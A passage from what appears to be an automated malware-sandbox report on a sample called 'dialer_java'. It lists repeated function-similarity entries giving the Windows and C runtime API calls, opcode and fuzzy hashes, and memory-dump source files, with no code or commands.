                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: _localtime64_s$msvcrt.dll
                                      • API String ID: 1646373207-3474473506
                                      • Opcode ID: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
                                      • Instruction ID: f6a03e378adf85ce4f6914a31b6c9b127b846b4484feaccdadc10b6122d4697d
                                      • Opcode Fuzzy Hash: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
                                      • Instruction Fuzzy Hash: 11F03A62B0AA4290EE04CF0EFC5A2B03B61AF54BC1F404476DC4DE3360EE2FA5C98306
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                      • API String ID: 1646373207-706389432
                                      • Opcode ID: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
                                      • Instruction ID: 7c837c848510dd4a204718ffa55a4fdc73e12da4151e062c2741d225fafda243
                                      • Opcode Fuzzy Hash: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
                                      • Instruction Fuzzy Hash: 2EE0EC26F0AA43C0EA44DF19F84A2302BA06F65744F800479C80DB7320EF2FA0CA830A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: CriticalLeaveSection$free
                                      • String ID:
                                      • API String ID: 2017658852-0
                                      • Opcode ID: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
                                      • Instruction ID: 494b866244919c33685a64f1a182bdf59909f9b0cccfbca76320643a01bf0d1f
                                      • Opcode Fuzzy Hash: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
                                      • Instruction Fuzzy Hash: EE518D23B0968780FB54AF09A95A3757FA2AF59784F080435C94EA7790DE3EE4C0C34A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: free$memcpy
                                      • String ID:
                                      • API String ID: 4107583993-0
                                      • Opcode ID: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
                                      • Instruction ID: 5ea942080f0196aaef978f646be1c9a3aa4628553af34c280adcca3a92318ecf
                                      • Opcode Fuzzy Hash: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
                                      • Instruction Fuzzy Hash: 9D513773616B91C6DA60CB1AF5896AEB7A8F7447C4F114235CB9E93B60EF39E0D18301
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
                                      • Instruction ID: caee6bb8c66f527d8b01885b10034ce6abbb2d57fe420e63c792cc538349cd6d
                                      • Opcode Fuzzy Hash: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
                                      • Instruction Fuzzy Hash: 7111A567B1A58642DF699A5DE09A3FE6754EF84780F000031DB6FA7790DE2EE5C2C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$memcpy
                                      • String ID:
                                      • API String ID: 3800483350-0
                                      • Opcode ID: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
                                      • Instruction ID: b2e49e1603042423a75ac2da64ecb164eb90f20b8d2729569a0feac8d8333136
                                      • Opcode Fuzzy Hash: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
                                      • Instruction Fuzzy Hash: 33A1F123B1AA8245EA718B1DE8413797BD1AB45BD0F084132CE8D97794EF7DE4C2C30A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
                                      • Instruction ID: 3ee7316f26603853003cb309757d0b0eafe53b4275d802af6fa64fc695da9763
                                      • Opcode Fuzzy Hash: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
                                      • Instruction Fuzzy Hash: 5F91F8B7B2424287E7388E1EE1527797B91EB14794F018135CB5AD3BA0DE3EF4808B05
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
                                      • Instruction ID: ef690c0a627d27c3d45c4627eb48853fbbcce6d7d3a61e8f689feb05ed7cd144
                                      • Opcode Fuzzy Hash: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
                                      • Instruction Fuzzy Hash: 5C91C173B042C68BF7348A2ED54A7797AA1EB14794F048139CB5AE7B81DE2EF4C18705
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
                                      • Instruction ID: 726ffcf59b4d1afa19b2c63eef48eb9c0e379a9756456fb1d6c06471af7a7c38
                                      • Opcode Fuzzy Hash: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
                                      • Instruction Fuzzy Hash: FE7195A7B05B4583DE248F1AE4852796BA1EF59FC0F108432CB8E577A4DF2ED582C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
                                      • Instruction ID: ed5b973521df92ccdadf8865cc3337f5274aedf00b40ffdfa04dc912bd4f3b12
                                      • Opcode Fuzzy Hash: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
                                      • Instruction Fuzzy Hash: BD51A1B3B05B8582EF258F1AE4953697B61EB99F84F048132CB8E573A4DF2DD086C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
                                      • Instruction ID: 3ecb5f7bba178dd3fa0020d7b30d96386548b9fd0dc58535b13226c4568cec88
                                      • Opcode Fuzzy Hash: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
                                      • Instruction Fuzzy Hash: 47518FB3A05B8582DF258F1AE4953697B61EB99FC4B048132CB9E477A4DF3DD086C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID:
                                      • API String ID: 2803490479-0
                                      • Opcode ID: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
                                      • Instruction ID: c8b4fc7f911a8e0cbc2e8c0e8dd4db0bfdb28d4c799802f40c27d008fc28d5d6
                                      • Opcode Fuzzy Hash: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
                                      • Instruction Fuzzy Hash: 8551023372AB8295EA558B1DD646BB97B94BF44B80F054931CF9C9B380EF39E4A1C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$reallocstrlen
                                      • String ID:
                                      • API String ID: 2374275640-0
                                      • Opcode ID: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
                                      • Instruction ID: 91f6eff30823404a7b7ac2406b6d116cb1ca3c986800526c4e39d626f38301ed
                                      • Opcode Fuzzy Hash: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
                                      • Instruction Fuzzy Hash: 7D412223705B8581EB24CB2AE8857A93BA4EB08B84F184571DF8C9B7D5DE39D4E2C305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: CriticalLeaveSectionfreememset
                                      • String ID:
                                      • API String ID: 1662925646-3916222277
                                      • Opcode ID: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
                                      • Instruction ID: 58f1ded4f77116610825af3293002ecd37fd399c47a20d71742da24c931c6268
                                      • Opcode Fuzzy Hash: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
                                      • Instruction Fuzzy Hash: 3841F563B0468686EA258F28944537C7B61FB547A4F408231CAAFA37D1DE3AE9D6C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$mallocmemcpy
                                      • String ID:
                                      • API String ID: 1059646398-0
                                      • Opcode ID: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
                                      • Instruction ID: eea63a4eb94fedb09f0a07712265e52f39613a41e78c6f70ab13fe61d006c57c
                                      • Opcode Fuzzy Hash: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
                                      • Instruction Fuzzy Hash: 2241E3A3B05B8182EB298F29E4453A96760EB58BC4F048235DB9D47395EF2DD5D2C304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
                                      • Instruction ID: 822315a8a4e12097bc08b2ea2ecff5b12f26bf6afd2cd9a30ae1a251d8d6388e
                                      • Opcode Fuzzy Hash: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
                                      • Instruction Fuzzy Hash: 34518DB3A06B8682DF258F5AE444269B761FB58BC4F048132CB8E537A4DF3DE091C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$mallocmemcpy
                                      • String ID:
                                      • API String ID: 1059646398-0
                                      • Opcode ID: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
                                      • Instruction ID: 3c92a0d70687f39499c4f70bdbc5b7fabaaa4e18d0ff149fd022356a0fca06d0
                                      • Opcode Fuzzy Hash: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
                                      • Instruction Fuzzy Hash: 5E41C1B3B06B8182EB158B19E4893697BA4EB44BC4F058231DFAD477A5DF2DD582C304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
                                      • Instruction ID: 2321a0e100fedb42fe811989a1b088b4e5c38a8473eadb321c73dbd9bae173d9
                                      • Opcode Fuzzy Hash: 20953f9e9240fd2666c6fd200cec74d4ec21cc6e74914b9a1bb946a4a4a6ed08
